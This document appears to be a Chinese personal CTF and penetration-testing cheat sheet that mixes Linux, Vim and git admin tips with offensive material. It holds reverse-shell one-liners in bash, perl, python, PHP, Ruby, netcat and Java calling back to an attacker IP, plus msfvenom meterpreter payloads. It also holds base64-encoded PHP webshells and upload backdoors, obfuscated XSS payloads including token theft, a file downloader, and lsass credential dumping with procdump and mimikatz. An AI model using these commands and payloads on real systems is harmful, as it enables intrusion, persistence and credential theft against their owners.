'Cheat Sheet'

Posted on | Edited on | In

CTF

流程

1.查看源代码
2.查看robots.txt

linux下空格绕过

1
2
3
4
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt

${IFS}
Shell 脚本中有个变量叫IFS(Internal Field Seprator) ,内部域分隔符。完整定义是The shell uses the value stored in IFS, which is the space, tab, and newline characters by default, to delimit words for the read and set commands, when parsing output from command substitution, and when performing variable substitution.

PHP is_numeric 绕过

使用十六进制绕过

PHP assert()

执行多个命令

1
2
3
<?php
	assert(print('Hello') and print(' ') and print('world'))
?>

outguess

1
outguess -r picture text

Linux

python导入bash

1
2
python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/bash")'

设置ssh使用root登录

1
2
3
vim /etc/ssh/sshd_config
PasswordAuthentication yes
PermitRootLogin yes

开机启动ssh服务

1
update-rc.d ssh enable

bash_history

复制粘贴

1
2
3
4
复制命令:Ctrl + Shift + C
粘贴命令:Ctrl + Shift + V
复制命令:Ctrl|Shift + Insert|用鼠标选中
粘贴命令:Crtl|Shift + Insert|单击鼠标滚轮
1
ctrl + 鼠标选中后粘贴会立即执行

\$()和\${}

\$()是变量替换
\${}是命令替换

添加用户

1
2
3
4
useradd -d "/home/chessur" -m -s "/bin/bash" chessur
//指定家目录
//-m 若家目录不存在,则强制创建家目录
//-s 指定shell

ufw

1
2
3
4
ufw default deny //设置端口默认关闭
ufw status //查看ufw状态
ufw allow port //放行端口
ufw enable //开启ufw

单用户模式

开机选advanced,按e,找到ro recovery nomodeset,修改为rw single init=/bin/bash ,修改之后按F10或Ctrl+X进入单用户模式

将显示用base64编码

1
cat index.php | base64

firewall

1
2
3
4
firewall-cmd --zone=public --add-port=80/tcp --permanent
systemctl stop firewalld
systemctl start firewalld
firewall-cmd --reload

Vim

修改tab为四个空格

1
2
3
4
5
vim /etc/vimrc

set ts=4
set expandtab
set autoindent

MySQL

更改secure_file_priv

没有my.ini,my.cnf里什么都没有,MySQL版本5.7.26

1
2
3
vim /etc/mysql/my.cnf
[mysqld]
secure_file_priv=''

参考:
can’t set secure_file_priv on mysql 5.7 Ubuntu 16.04

版本

5.0增加information_schema

4.0支持union

反弹shell

Bash

1
2
bash -i >& /dev/tcp/192.168.126.1/6666 0>&1
bash -i 5<>/dev/tcp/192.168.126.1/6666 0>&5 1>&5

PERL

1
perl -e 'use Socket;$i="192.168.126.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.126.1",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

1
php -r '$sock=fsockopen("192.168.126.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("192.168.126.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

1
nc -e /bin/sh 192.168.126.1 6666

其他

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.1 6666 >/tmp/f

Java

1
2
3
4
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.126.1/6666;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
<?PHP fputs(fopen('windy.php','w'),'<?php eval($_POST[windy])?>');?>

图片反弹Shell

工具:https://github.com/peewpw/Invoke-PSImage

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.1 LPORT=6666 -f psh-reflection  -o /root/image_shell.ps1

Kali

weevely

1
2
weevely generate Windy /root/windy.php
weevely terminal http://target.com/windy.php Windy

修改桥接静态IP

1.VMware选择网卡
2.修改配置文件

1
2
3
4
5
6
7
8
9
vim /etc/network/interfaces
auto eth0 
#
iface eth0 inet static
address 192.168.126.126
netmask 255.255.255.0
gateway 192.168.126.1s
broadcast 192.168.126.255
dns-nameservers 114.114.114.114

XSS

payload

1
javascrip&#x0000000074:alert(1)

&#x0000空子节

1
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"")())()</script>

url转码

1
%3C%73%63%72%69%70%74%3E%24%3D%7E%5B%5D%3B%24%3D%7B%5F%5F%5F%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%5F%24%3A%2B%2B%24%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%24%5F%3A%2B%2B%24%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C%5F%24%24%3A%2B%2B%24%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24%5F%5F%3A%2B%2B%24%2C%24%5F%24%3A%2B%2B%24%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24%5F%5F%5F%3A%2B%2B%24%2C%24%5F%5F%24%3A%2B%2B%24%7D%3B%24%2E%24%5F%3D%28%24%2E%24%5F%3D%24%2B%22%22%29%5B%24%2E%24%5F%24%5D%2B%28%24%2E%5F%24%3D%24%2E%24%5F%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%24%24%3D%28%24%2E%24%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%28%24%2E%5F%5F%3D%24%2E%24%5F%5B%24%2E%24%24%5F%5D%29%2B%28%24%2E%24%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%5F%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%5F%5D%29%2B%24%2E%24%5F%5B%24%2E%24%5F%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%24%2B%24%2E%24%3B%24%2E%24%24%3D%24%2E%24%2B%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%2B%24%2E%24%2B%24%2E%24%24%3B%24%2E%24%3D%28%24%2E%5F%5F%5F%29%5B%24%2E%24%5F%5D%5B%24%2E%24%5F%5D%3B%24%2E%24%28%24%2E%24%28%24%2E%24%24%2B%22%5C%22%22%2B%24%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5B%24%2E%5F%24%5F%5D%2B%24%2E%24%24%24%5F%2B%22%5C%5C%22%2B%24%2E%5F%5F%24%2B%24%2E%24%24%5F%2B%24%2E%5F%24%5F%2B%24%2E%5F%5F%2B%22%28%22%2B%24%2E%5F%5F%24%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3C%2F%73%63%72%69%70%74%3E
1
2
3
<script>eval('
\x76\x61\x72\40\141\75String.fromCharCode(49);\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>
1
2
3
<script>eval('
\x76\x61\x72\40\141\75String.fromCharCode(%34%39);\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>
1
2
3
<script>eval('
\x76\x61\x72\40\141\75%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%34%39%29%3b\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>

获取usertoken

1
<iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

PHP

伪协议

写一句话

1
<?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydXaW5keSddKT8+|base64 -d > upload/1.php` ;?>
1
<?php fputs(fopen('./Windy.php','w'),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbV2luZHldKTs/Pg=='));?>

一句话写上传马

1
?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
1
2
3
4
5
<?php 
@$temp = $_FILES['upload_file']['tmp_name'];
@$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '' method = 'POST' ENCTYPE='multipart/form-data'>\n";echo "Local file: <input type = 'file' name = 'upload_file'>\n";echo "<input type = 'submit' value = 'Upload'>\n";echo "</form>\n<pre>\n\n</pre>";}else {if(move_uploaded_file($temp,$file)){echo "File uploaded successfully.<p>\n";}else {echo "Unable to upload " . $file . ".<p>\n";}}?>

终止解析

1
<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; eval($_POST[Windy]); __halt_compiler(); ?></h1>

MSF

执行命令反弹shell,支持PHP,Python

1
2
use exploit/multi/script/web_delivery
set payload php/meterpreter/reverse_tcp

生成php反弹shell

1
2
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.126.126 lport=126 -f raw -o reverse_shell.php
use exploit/multi/handler

添加路由,在meterpreter下

1
run autoroute -s 192.168.126.0/24

扫描存活主机

1
use auxiliary/scanner/discovery/arp_sweep

socks代理

1
2
use auxiliary/server/socks4a
use auxiliary/server/socks5

msfvenom

1
2
3
4
-e 编码
-i 编码次数
-a 指定位数 -a x86
-platform 指定系统 --platform win

msfvenom自动补全

1.安装zsh
2.新建~/.oh-my-zsh/custom/plugins/msfvenom
3.将脚本放在上面的目录
4.编辑zsh配置文件

1
2
vim ~/.zshrc
plugins=(msfvenom)

5.更新zshsource ~/.zshrc

command shell 升级 meterpreter shell

1
2
3
Ctrl + Z
y
sessions -u ID

Mysql

命令行导入数据库

1
mysql -uroot -pPassword databasename < filedir

后台拿Shell

修改模板代码

修改上传图片格式

上传模板若会自动解压,可以上传zip压缩包

WebShell

WebShell的权限

Webshell的权限一般是由解析执行WebShell的Web容器自身权限决定的
如果是linux做了操作系统加固 能上传 但是只能执行系统命令权限 但是无法获得shell那就说明做了目录权限加固但是没有做中间件加固(可上传)没做操作系统加固
目录加固的权限是可读可执行但不可写

Windows提权

PowerShell提权

DOS下载文件

1.创建downfile.vbs下载文件

1
2
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp

2.使用bitsadmin命令

1
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

PR提权

1
2
pr.exe "net user chessur 123.com /add" 添加用户
pr.exe "net localgroup chessur /add" 将用户加入管理员组

名词解释

钓鱼攻击

水坑攻击

一种计算机入侵手法,其针对的目标多为特定的团体(组织、行业、地区等)。攻击者首先通过猜测(或观察)确定这组目标经常访问的网站,并入侵其中一个或多个,植入恶意软件,最后,达到感染该组目标中部分成员的目的。

信息收集

员工信息

社交关系网
博客
工资银行账户

企业使用软件信息
业务伙伴
销售银行账号
招聘岗位

JavaScript编码

1
2
var code = '\u003c'
code

抓Hash

procdump

Windows自带的提取dump工具,可以不被杀软杀掉

1
procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v9.0

然后使用mimikatz查看

1
2
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

win10测试无法使用mimikatz查看,版本Build 17763
WinXP可以使用

计划任务

Windows

at

Vim

块选择,Ctrl+V

设置Tab为四个空格

1
2
3
vim /etc/vim/vimrc
set ts=4
set expandtab

对已保存的文件,可以使用以下命令进行空格和Tab的替换

Tab替换为空格

1
2
3
:set ts=4
:set expantab
:%retab!

空格替换为Tab

1
2
3
:set ts=4
:set noexpandtab
:%retab!

git

添加配置

1
git config --global http.proxy IP:port

删除配置

1
git config --global --unset http.proxy

VS Code

PHP插件

PHP Debug

需求:

需要设置XDebug

作用

开启PHP调试功能

PHP intelliSense

需求:

配置PHP7.0以上版本为环境变量

作用:

自动补全

显示函数所需参数

跳转函数定义

搜索函数调用